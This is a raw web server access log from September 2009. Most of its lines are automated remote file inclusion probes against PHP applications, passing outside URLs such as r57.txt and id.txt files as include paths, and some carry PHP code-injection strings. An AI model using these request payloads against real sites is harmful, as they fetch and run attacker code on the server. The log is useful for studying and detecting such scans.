64.34.169.243 - - [12/Sep/2009:05:32:50 -0400] "GET /index.php?pag=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:32:50 -0400] "GET /logs/index.php?pag=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
72.11.145.8 - - [12/Sep/2009:05:32:52 -0400] "GET /logs/access_log.Q109062900//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
72.11.145.8 - - [12/Sep/2009:05:32:52 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
72.11.145.8 - - [12/Sep/2009:05:32:52 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
58.120.226.113 - - [12/Sep/2009:05:33:18 -0400] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:33:18 -0400] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:33:18 -0400] "GET /logs/access_log.Q109081400%20%20/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:05:33:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.95.33 - - [12/Sep/2009:05:33:29 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:05:33:30 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
65.55.105.244 - - [12/Sep/2009:05:33:35 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.244 - - [12/Sep/2009:05:33:35 -0400] "GET / HTTP/1.1" 200 409 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
58.120.226.113 - - [12/Sep/2009:05:33:53 -0400] "GET /logs/access_log.Q109061600%20%20/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:05:33:55 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:05:33:55 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:05:34:08 -0400] "GET /logs/error_log.Q109080700//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:34:12 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
72.34.235.215 - - [12/Sep/2009:05:34:22 -0400] "GET ///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:22 -0400] "GET /logs///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:23 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:23 -0400] "GET /logs/access_log.Q109072200%20%20///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:38 -0400] "GET /logs///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:38 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:38 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:34:39 -0400] "GET ///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:35:21 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.206.123.177 - - [12/Sep/2009:05:35:54 -0400] "GET /logs/error_log.Q109082100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
72.34.235.215 - - [12/Sep/2009:05:35:54 -0400] "GET ///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:35:54 -0400] "GET /logs///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:35:54 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.206.123.177 - - [12/Sep/2009:05:35:54 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
72.34.235.215 - - [12/Sep/2009:05:35:55 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.206.123.177 - - [12/Sep/2009:05:35:55 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
212.186.220.246 - - [12/Sep/2009:05:37:00 -0400] "GET //index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.186.220.246 - - [12/Sep/2009:05:37:00 -0400] "GET /logs//index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.186.220.246 - - [12/Sep/2009:05:37:00 -0400] "GET /logs/access_log.Q109080200%20%20//index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.66.115 - - [12/Sep/2009:05:37:44 -0400] "GET /logs/access_log.Q109061000/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
89.108.66.115 - - [12/Sep/2009:05:37:44 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
89.108.66.115 - - [12/Sep/2009:05:37:45 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 17506 "-" "libwww-perl/5.812"
209.59.12.99 - - [12/Sep/2009:05:38:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.66.115 - - [12/Sep/2009:05:38:39 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
85.18.236.8 - - [12/Sep/2009:05:38:44 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:38:44 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:38:44 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:05:40:10 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:05:40:10 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:05:40:10 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:05:40:10 -0400] "GET /logs/access_log.Q109081200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:40:10 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:40:13 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:40:13 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.108.64.232 - - [12/Sep/2009:05:40:46 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
118.129.166.203 - - [12/Sep/2009:05:40:55 -0400] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:40:57 -0400] "GET //skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:40:57 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:40:57 -0400] "GET /logs/access_log.Q109082500//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:05:41:09 -0400] "GET /logs/access_log.Q108041500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.66.115 - - [12/Sep/2009:05:41:39 -0400] "GET /logs/access_log.Q109052900/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
118.129.166.203 - - [12/Sep/2009:05:41:55 -0400] "GET /logs/access_log.Q109081600%20%20//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:41:57 -0400] "GET //skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:41:57 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:41:57 -0400] "GET /logs/access_log.Q109082500%20%20//skin/zero_vote/error.php?dir=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.186.220.246 - - [12/Sep/2009:05:41:58 -0400] "GET /logs/access_log.Q109080200//index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.152.91.152 - - [12/Sep/2009:05:42:05 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
119.152.91.152 - - [12/Sep/2009:05:42:05 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
91.121.102.57 - - [12/Sep/2009:05:42:18 -0400] "GET //citywriter/head.php?path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 218 "-" "libwww-perl/5.803"
91.121.102.57 - - [12/Sep/2009:05:42:29 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
91.121.102.57 - - [12/Sep/2009:05:42:29 -0400] "GET //citywriter/head.php?path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 218 "-" "libwww-perl/5.803"
91.121.102.57 - - [12/Sep/2009:05:42:30 -0400] "GET /logs//citywriter/head.php?path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
119.152.91.152 - - [12/Sep/2009:05:42:34 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
119.152.91.152 - - [12/Sep/2009:05:42:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
62.75.202.55 - - [12/Sep/2009:05:42:39 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:42:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:42:39 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:43:00 -0400] "GET /logs/access_log.Q109080400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:05:43:03 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:43:11 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:43:11 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:05:43:11 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:05:43:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.75.202.55 - - [12/Sep/2009:05:43:20 -0400] "GET /logs/access_log.Q109080400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.102.57 - - [12/Sep/2009:05:43:37 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://www.invasaohacking.com/r57.txt????? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
212.186.220.246 - - [12/Sep/2009:05:44:54 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:45:12 -0400] "GET //index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:45:12 -0400] "GET /logs/access_log.Q109080200//index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:45:12 -0400] "GET /logs//index.php?option=com_sitemap&Itemid=134/index.php%20option=com_sitemap&Itemid=&mosConfig_absolute_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:05:45:21 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.167 - - [12/Sep/2009:05:45:23 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.129.166.203 - - [12/Sep/2009:05:45:54 -0400] "GET //common/db.php?commonpath=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:45:54 -0400] "GET /logs//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:05:45:54 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:05:46:28 -0400] "GET /logs/access_log.Q108060800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.169.243 - - [12/Sep/2009:05:47:02 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:47:02 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:47:02 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.31.150.79 - - [12/Sep/2009:05:47:07 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.31.150.79 - - [12/Sep/2009:05:47:07 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.31.150.79 - - [12/Sep/2009:05:47:07 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.31.150.79 - - [12/Sep/2009:05:47:07 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.31.150.79 - - [12/Sep/2009:05:48:15 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.31.150.79 - - [12/Sep/2009:05:48:15 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:05:48:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.32.230.27 - - [12/Sep/2009:05:48:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
81.32.230.27 - - [12/Sep/2009:05:48:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
81.32.230.27 - - [12/Sep/2009:05:48:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
81.32.230.27 - - [12/Sep/2009:05:48:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
64.34.169.243 - - [12/Sep/2009:05:51:09 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.108.66.115 - - [12/Sep/2009:05:51:18 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
64.92.112.118 - - [12/Sep/2009:05:51:42 -0400] "GET /error.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:05:51:42 -0400] "GET /logs/error.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:05:51:42 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:08 -0400] "GET //skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:08 -0400] "GET /logs//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:08 -0400] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.34.235.215 - - [12/Sep/2009:05:52:08 -0400] "GET /logs/access_log.Q109072500%20%20//skin/ggambo7002_board//setup.php?dir=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:05:52:10 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
